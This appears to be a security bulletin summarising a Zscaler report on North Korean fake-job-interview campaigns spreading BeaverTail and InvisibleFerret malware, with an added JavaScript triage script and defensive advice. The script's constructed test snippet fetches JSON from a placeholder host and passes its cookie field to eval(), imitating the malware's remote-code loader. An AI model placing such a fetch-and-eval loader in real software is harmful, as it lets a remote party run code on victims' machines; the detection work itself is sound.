From Pyongyang to Your Payroll: The Rise of North Korean Remote Workers in the West
Summary:
In November 2023, a security vendor discovered that North Korean threat actors were using the Contagious Interview and WageMole campaigns to procure remote employment opportunities in Western countries, thus evading the financial sanctions against North Korea (DPRK). The main goal of Contagious Interview is data theft, while WageMole's objective is to use the data stolen by Contagious Interview, together with social engineering tactics, to help these North Korea-aligned threat actors land remote jobs and perform cyberespionage. Zscaler ThreatLabz, through recent analysis, has uncovered improvements and updates in the adversary's campaign tactics: improved script obfuscation, and an expanded reach achieved by adding new file types, Windows installers and macOS apps disguised as chat applications, as the initial infection vector. ThreatLabz monitored the installed BeaverTail and InvisibleFerret malware during the infection chain and confirmed the attackers stole source code, cryptocurrency data, and personal information from over 100 victim devices on different operating systems. BeaverTail incorporates a new obfuscation technique that uses a JavaScript obfuscator to mask its functionality.
In recently observed activity documented by ThreatLabz, the threat actor posted a Full Stack job opening on part-time hiring platforms. As part of the adversary's interview process for potential employees, applicants were directed to GitHub to solve a coding problem; the repository, however, is controlled by the attacker and hosts BeaverTail malware. Contagious Interview specifically targets web, AI, and cryptocurrency developers and relies heavily on platforms like GitHub for hosting malicious files. In some cases, additional malicious code is retrieved from attacker-controlled servers and executed dynamically: the cookie property is extracted from the fetched JSON data and run via the eval function. This highlights the effort the threat actor has put into evading detection. The BeaverTail Python script downloads additional payloads, including the main backdoor script, InvisibleFerret. The threat actor typically exfiltrates basic system information, PDF documents, image files, and source code using one of InvisibleFerret's main components. Source code is often a target because developers sometimes store credentials such as login IDs and passwords in plain text. In August 2024, the InvisibleFerret malware author added new backdoor commands, additional exfiltration targets, and communication channels. WageMole threat actors use this data stolen by Contagious Interview to acquire remote work in countries like the United States.
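As an added illustration (not code from the Zscaler report or from the malware), the following static triage heuristic scores a JavaScript file pulled from a "coding challenge" repository for the traits described above: remote data fed to eval(), a cookie property lifted out of JSON, and obfuscator fingerprints. The _0x identifier style and hex-escaped string tables are assumed here to be the usual javascript-obfuscator signature; the fixtures are constructed and the suspect one is only scanned, never executed.

```javascript
// Added example, not code from the Zscaler report or the malware. Static
// triage of JavaScript source for the BeaverTail-style traits the report
// describes. _0x identifiers and hex-escaped string tables are assumed to be
// the usual javascript-obfuscator fingerprint (assumption, not from the page).
const SIGNALS = [
  { id: "dynamic-eval",     weight: 3, re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
  { id: "remote-fetch",     weight: 2, re: /\brequire\s*\(\s*['"](https?|axios|request)['"]\s*\)|\bfetch\s*\(/ },
  { id: "cookie-payload",   weight: 2, re: /\.cookie\b|\[\s*['"]cookie['"]\s*\]/ },
  { id: "hex-identifiers",  weight: 2, re: /\b_0x[0-9a-f]{4,}\b/i },
  { id: "long-hex-escapes", weight: 1, re: /(\\x[0-9a-f]{2}){8,}/i },
];

// Returns matched signal ids, a weighted score and a verdict. Remote data
// reaching eval() is treated as decisive regardless of the score.
function scanJsSource(src) {
  const matched = SIGNALS.filter((s) => s.re.test(src));
  const hits = matched.map((s) => s.id);
  const score = matched.reduce((sum, s) => sum + s.weight, 0);
  const evalOfRemote = hits.includes("dynamic-eval") && hits.includes("remote-fetch");
  const verdict = evalOfRemote || score >= 5 ? "suspicious" : "benign";
  return { hits, score, verdict };
}

// Constructed fixtures (not real samples). The second only imitates the
// pattern described in the report, with a placeholder host, and is never run.
const BENIGN_CHALLENGE = `
function reverseWords(s) {
  return s.split(' ').reverse().join(' ');
}
module.exports = { reverseWords };
`;

const SUSPECT_SNIPPET = `
const _0x4a2b = ['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f'];
const https = require('https');
https.get('https://PLACEHOLDER.invalid/api', (res) => {
  let body = '';
  res.on('data', (d) => (body += d));
  res.on('end', () => eval(JSON.parse(body).cookie));
});
`;

// Triage a map of file name -> source and return only the files worth a look.
function triageFiles(files) {
  return Object.entries(files)
    .map(([name, src]) => ({ name, ...scanJsSource(src) }))
    .filter((r) => r.verdict === "suspicious");
}
```

Run it over every .js file of a cloned interview repository before anything in it is executed; a "suspicious" verdict means the file should be opened only in a disposable virtual machine.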
Security Officer Comments:
This recent activity from these campaigns highlights the ever-improving nature of nation state-aligned threats. The adversary has expanded the reach of their attacks by leveraging masqueraded installers and applications on Windows and macOS. The cyclical nature of these infection chains allows the threat actor to build on the success of previous attacks. DPRK threat actors will continue to find effective ways to steal funds and perform cyberespionage for the North Korean regime. With the vast amount of resources available to these actors, this sophisticated threat can be difficult to proactively defend against. With refined obfuscation techniques, multi-platform compatibility, and widespread data theft, these campaigns represent a growing threat to businesses and individuals alike.
Suggested Corrections:
IOCs:
Contagious Interview
WageMole
How to defend against Contagious Interview
- Review and monitor any executions or connections associated with the indicators we have provided in the Indicators of Compromise (IOCs) section.
- Never save sensitive information, such as login credentials or cryptocurrency keys, in plain text.
- Avoid storing personal information, including passports, identity cards, and other sensitive details, insecurely.
- Exercise caution when contacted by unknown individuals.
- Always execute suspicious files in a virtual environment.
- Review and monitor any contacts from the email and social media accounts we have provided in the Indicators of Compromise (IOCs) section.
- Verify employment history by directly confirming the candidate's role and tenure with the company listed on their resume.
- Ensure new hires have limited access to sensitive information and systems until they have successfully completed the probationary period.
- Conduct a detailed background check, including education, employment history, and any relevant professional certifications.
- Verify the applicant’s work history locations to ensure that they are credible and consistent.
- Carefully examine and verify all provided identification documents to ensure authenticity and prevent identity fraud.
https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west